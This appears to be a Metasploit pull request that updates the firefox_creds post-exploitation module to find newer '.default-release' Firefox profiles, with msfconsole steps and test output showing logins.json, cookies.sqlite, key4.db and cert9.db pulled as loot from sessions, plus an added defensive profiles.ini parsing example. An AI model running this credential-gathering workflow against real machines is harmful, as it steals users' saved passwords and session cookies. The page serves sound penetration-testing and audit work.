Support more recent versions of Firefox's default profile directory #14877

Merged


security-curious (Contributor) commented Mar 11, 2021

The default Firefox profile directory now no longer ends in `.default` but instead `.default-release`. For backwards compat the new regex supports both. For more information see:

https://support.mozilla.org/bm/questions/1264072#answer-1235567

It's possible we might want to also support things like `.default-nightly`, etc. but really if we want to do more than grab the default profile we should read the `profiles.ini` file to get an itemized list of profiles from Firefox itself. This would also future-proof this script and allow us to capture non-default profiles.

Since profiles are not generally used by most Firefox users, just going for the simpler solution of adjusting the regex.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use post/multi/gather/firefox_creds
  • Verify the thing does what it should

```
msf6 post(multi/gather/firefox_creds) > set SESSION 1
SESSION => 1
msf6 post(multi/gather/firefox_creds) > run

[*] Checking for Firefox profile in: /home/minhtuan/.mozilla/firefox

[*] Profile: /home/minhtuan/.mozilla/firefox/fvbljmev.default-release
[+] Downloaded logins.json: /home/kali/.msf4/loot/20210310215308_default_172.16.3.129_ff.fvbljmev.logi_049030.bin
[+] Downloaded cookies.sqlite: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.cook_856738.bin
[+] Downloaded cert9.db: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.cert_400135.db
[+] Downloaded key4.db: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.key4_501159.db

[*] Profile: /home/minhtuan/.mozilla/firefox/1snfwp29.default

[*] Post module execution completed
```

Can test it out yourself on this Vulnhub - https://www.vulnhub.com/entry/bluesky-1,623/

The default firefox profile directory now no longer ends in `.default`
but instead `.default-release`. For backwards compat the new regex
supports both. For more information see:

https://support.mozilla.org/bm/questions/1264072#answer-1235567

It's possible we might want to also support things like
`.default-nightly`, etc but really if we want to do more than grab
the default profile we should read the `profiles.ini` file to get
an itemized list of profiles from Firefox itself. This would also
future-proof this script.

Since profiles are not generally used by most Firefox users just going
for the simpler solution of looking for `.default-release`.
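
The point above about `profiles.ini` being more reliable than directory-suffix matching, as an added example that is not part of this PR or of the module's code: for a defender inventorying which profile directories hold `logins.json` and `key4.db` (for file-access auditing or forensic triage), it reads a constructed `profiles.ini` and reports the directories a suffix pattern would miss. The two regexes, the `work` profile, the base path and the helper names are assumptions made for illustration.

```ruby
# Added example; not code from the firefox_creds module.
# SAMPLE_INI is constructed; the "work" profile and its path are made up.
SAMPLE_INI = <<~INI
  [Profile1]
  Name=default
  IsRelative=1
  Path=1snfwp29.default

  [Profile0]
  Name=default-release
  IsRelative=1
  Path=fvbljmev.default-release

  [Profile2]
  Name=work
  IsRelative=0
  Path=/srv/ff-profiles/work
INI

# Minimal INI reader: section name => { key => value }. Comment lines are skipped.
def parse_ini(text)
  sections = {}
  current = nil
  text.each_line do |raw|
    line = raw.strip
    if (m = line.match(/\A\[(.+)\]\z/))
      current = sections[m[1]] = {}
    elsif current && (m = line.match(/\A([^=;#][^=]*)=(.*)\z/))
      current[m[1].strip] = m[2].strip
    end
  end
  sections
end

# Every [ProfileN] directory; relative paths resolve against profiles.ini's folder.
def profile_dirs(ini_text, base_dir)
  parse_ini(ini_text).map do |section, kv|
    next unless section.match?(/\AProfile\d+\z/) && kv['Path']
    kv['IsRelative'] == '0' ? kv['Path'] : File.join(base_dir, kv['Path'])
  end.compact
end

# Directories listed in profiles.ini that a basename pattern would not match.
def missed_by_pattern(ini_text, base_dir, pattern)
  profile_dirs(ini_text, base_dir).reject { |d| File.basename(d).match?(pattern) }
end

BASE = '/home/user/.mozilla/firefox' # constructed base directory
puts missed_by_pattern(SAMPLE_INI, BASE, /\.default\z/)
puts missed_by_pattern(SAMPLE_INI, BASE, /\.default(-release)?\z/)
```

A pattern covering both suffixes still leaves out the custom-named profile stored outside the default tree, which only the `profiles.ini` listing reveals.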

gwillcox-r7 (Contributor) commented

Works as mentioned:

```
msf6 exploit(multi/handler) > use post/multi/gather/firefox_creds
msf6 post(multi/gather/firefox_creds) > show options

Module options (post/multi/gather/firefox_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DECRYPT  false            no        Decrypts passwords without third party tools
   SESSION                   yes       The session to run this module on.

msf6 post(multi/gather/firefox_creds) > set SESSION 1
SESSION => 1
msf6 post(multi/gather/firefox_creds) > run

[*] Checking for Firefox profile in: C:\Users\test\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\9de42mgk.default-release
[+] Downloaded cert9.db: /home/gwillcox/.msf4/loot/20210312105153_default_172.18.63.23_ff.9de42mgk.cert_045769.bin
[+] Downloaded cookies.sqlite: /home/gwillcox/.msf4/loot/20210312105154_default_172.18.63.23_ff.9de42mgk.cook_412481.bin
[+] Downloaded key4.db: /home/gwillcox/.msf4/loot/20210312105154_default_172.18.63.23_ff.9de42mgk.key4_459487.bin
[+] Downloaded logins.json: /home/gwillcox/.msf4/loot/20210312105155_default_172.18.63.23_ff.9de42mgk.logi_615139.bin

[*] Profile: C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\ytubor4d.default

[*] Post module execution completed
msf6 post(multi/gather/firefox_creds) >
```

Will land this in now, thanks for submitting this PR @security-curious and congrats on your first landed MSF PR!

@gwillcox-r7 gwillcox-r7 changed the title Update Firefox Default Profile Directory Support more recent versions of Firefox's default profile directory Mar 12, 2021
@gwillcox-r7 gwillcox-r7 merged commit ef97b33 into rapid7:master Mar 12, 2021
@gwillcox-r7 gwillcox-r7 added the rn-enhancement release notes enhancement label Mar 12, 2021

gwillcox-r7 (Contributor) commented Mar 12, 2021

Release Notes

Updated the `post/multi/gather/firefox_creds` module to support gathering profiles from newer versions of Firefox which now use the default profile name of `.default-release` vs. the old name of `.default`.
